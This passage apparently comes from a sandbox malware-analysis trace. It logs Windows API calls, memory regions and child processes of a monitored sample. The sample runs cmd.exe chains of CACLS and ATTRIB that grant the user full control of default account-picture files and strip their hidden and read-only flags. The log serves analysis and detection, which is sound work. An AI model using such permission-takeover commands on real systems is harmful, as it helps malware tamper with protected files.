lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0188.022] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0188.022] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x26ef9c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26efe8 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp\"", lpProcessInformation=0x26efe8*(hProcess=0x4c, hThread=0x50, dwProcessId=0xe00, dwThreadId=0x95c)) returned 1 [0188.024] CloseHandle (hObject=0x50) returned 1 [0188.024] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0188.024] GetEnvironmentStringsW () returned 0x2d2410* [0188.024] FreeEnvironmentStringsW (penv=0x2d2410) returned 1 [0188.024] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0188.057] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x26eedc | out: lpExitCode=0x26eedc*=0x0) returned 1 [0188.057] CloseHandle (hObject=0x4c) returned 1 [0188.057] _vsnwprintf (in: _Buffer=0x26f024, _BufferCount=0x13, _Format="%08X", _ArgList=0x26eee8 | out: _Buffer="00000000") returned 8 [0188.057] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0188.057] GetEnvironmentStringsW () returned 0x2d2410* [0188.057] FreeEnvironmentStringsW (penv=0x2d2410) returned 1 [0188.057] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0188.058] GetEnvironmentStringsW () returned 0x2d2410* [0188.058] FreeEnvironmentStringsW (penv=0x2d2410) returned 1 [0188.058] DeleteProcThreadAttributeList (in: lpAttributeList=0x26ef40 | out: lpAttributeList=0x26ef40) [0188.058] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.058] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0188.058] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.058] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0188.058] _get_osfhandle (_FileHandle=0) returned 0x3 [0188.058] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0188.058] SetConsoleInputExeNameW () returned 0x1 [0188.058] GetConsoleOutputCP () returned 0x1b5 [0188.058] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0188.058] SetThreadUILanguage (LangId=0x0) returned 0x409 [0188.058] exit (_Code=0) Process: id = "401" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16c20" os_pid = "0x8d0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "400" os_parent_pid = "0xec8" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27266 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27267 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27268 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27269 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 27270 start_va = 0xa90000 end_va = 0xa98fff entry_point = 0xa90000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 27271 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27272 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27273 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27274 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 27275 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27276 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27277 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27278 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 27279 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27280 start_va = 0x300000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 27281 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27282 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27283 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27284 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27285 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27286 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 27287 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 571 os_tid = 0x868 Thread: id = 572 os_tid = 0x894 Process: id = "402" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16d80" os_pid = "0xe00" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "400" os_parent_pid = "0xec8" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27288 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27289 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27290 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27291 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 27292 start_va = 0x430000 end_va = 0x436fff entry_point = 0x430000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 27293 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27294 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27295 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27296 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 27297 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27298 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27299 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27300 start_va = 0xb0000 end_va = 0x116fff entry_point = 0xb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27301 start_va = 0x160000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 27302 start_va = 0x610000 end_va = 0x61ffff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 27303 start_va = 0x6dec0000 end_va = 0x6dedcfff entry_point = 0x6dec0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 27304 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27305 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27306 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27307 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27308 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27309 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27310 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 27311 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27312 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 27313 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27314 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27315 start_va = 0x260000 end_va = 0x327fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 27316 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27317 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 573 os_tid = 0x95c Process: id = "403" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ca0" os_pid = "0x84c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27318 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27319 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27320 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27321 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 27322 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 27323 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27324 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27325 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27326 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 27327 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27328 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27329 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27330 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27331 start_va = 0x2c0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 27332 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 27333 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 27334 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27335 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27336 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27337 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27338 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 27339 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27340 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27341 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27342 start_va = 0x3e0000 end_va = 0x4a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 27343 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27344 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 27345 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 27346 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 27347 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 27348 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 27349 start_va = 0x4b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 27350 start_va = 0x5c0000 end_va = 0x11bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 27351 start_va = 0x11c0000 end_va = 0x1322fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011c0000" filename = "" Region: id = 27352 start_va = 0x1330000 end_va = 0x15fefff entry_point = 0x1330000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 574 os_tid = 0x42c [0188.125] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fcb4 | out: lpSystemTimeAsFileTime=0x18fcb4*(dwLowDateTime=0xa5085380, dwHighDateTime=0x1d440a9)) [0188.125] GetCurrentProcessId () returned 0x84c [0188.125] GetCurrentThreadId () returned 0x42c [0188.125] GetTickCount () returned 0x35acc [0188.125] QueryPerformanceCounter (in: lpPerformanceCount=0x18fcac | out: lpPerformanceCount=0x18fcac*=24491635353) returned 1 [0188.128] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0188.128] __set_app_type (_Type=0x1) [0188.128] __p__fmode () returned 0x76b331f4 [0188.128] __p__commode () returned 0x76b331fc [0188.128] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0188.128] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0188.128] GetCurrentThreadId () returned 0x42c [0188.128] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x42c) returned 0x38 [0188.128] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0188.128] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0188.128] SetThreadUILanguage (LangId=0x0) returned 0x409 [0188.128] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0188.128] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fc44 | out: phkResult=0x18fc44*=0x0) returned 0x2 [0188.129] VirtualQuery (in: lpAddress=0x18fc7b, lpBuffer=0x18fc14, dwLength=0x1c | out: lpBuffer=0x18fc14*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0188.129] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18fc14, dwLength=0x1c | out: lpBuffer=0x18fc14*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0188.129] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18fc14, dwLength=0x1c | out: lpBuffer=0x18fc14*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0188.129] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18fc14, dwLength=0x1c | out: lpBuffer=0x18fc14*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0188.129] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18fc14, dwLength=0x1c | out: lpBuffer=0x18fc14*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0188.129] GetConsoleOutputCP () returned 0x1b5 [0188.129] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0188.129] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0188.129] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.129] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0188.129] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.129] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0188.129] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.129] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0188.130] _get_osfhandle (_FileHandle=0) returned 0x3 [0188.130] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0188.130] _get_osfhandle (_FileHandle=0) returned 0x3 [0188.130] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0188.130] GetEnvironmentStringsW () returned 0x2f0308* [0188.130] FreeEnvironmentStringsW (penv=0x2f0308) returned 1 [0188.130] GetEnvironmentStringsW () returned 0x2f0308* [0188.130] FreeEnvironmentStringsW (penv=0x2f0308) returned 1 [0188.130] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ebb4 | out: phkResult=0x18ebb4*=0x40) returned 0x0 [0188.130] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ebbc, lpData=0x18ebc0, lpcbData=0x18ebb8*=0x1000 | out: lpType=0x18ebbc*=0x0, lpData=0x18ebc0*=0xb8, lpcbData=0x18ebb8*=0x1000) returned 0x2 [0188.130] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ebbc, lpData=0x18ebc0, lpcbData=0x18ebb8*=0x1000 | out: lpType=0x18ebbc*=0x4, lpData=0x18ebc0*=0x1, lpcbData=0x18ebb8*=0x4) returned 0x0 [0188.130] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ebbc, lpData=0x18ebc0, lpcbData=0x18ebb8*=0x1000 | out: lpType=0x18ebbc*=0x0, lpData=0x18ebc0*=0x1, lpcbData=0x18ebb8*=0x1000) returned 0x2 [0188.130] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ebbc, lpData=0x18ebc0, lpcbData=0x18ebb8*=0x1000 | out: lpType=0x18ebbc*=0x4, lpData=0x18ebc0*=0x0, lpcbData=0x18ebb8*=0x4) returned 0x0 [0188.131] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ebbc, lpData=0x18ebc0, lpcbData=0x18ebb8*=0x1000 | out: lpType=0x18ebbc*=0x4, lpData=0x18ebc0*=0x40, lpcbData=0x18ebb8*=0x4) returned 0x0 [0188.131] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ebbc, lpData=0x18ebc0, lpcbData=0x18ebb8*=0x1000 | out: lpType=0x18ebbc*=0x4, lpData=0x18ebc0*=0x40, lpcbData=0x18ebb8*=0x4) returned 0x0 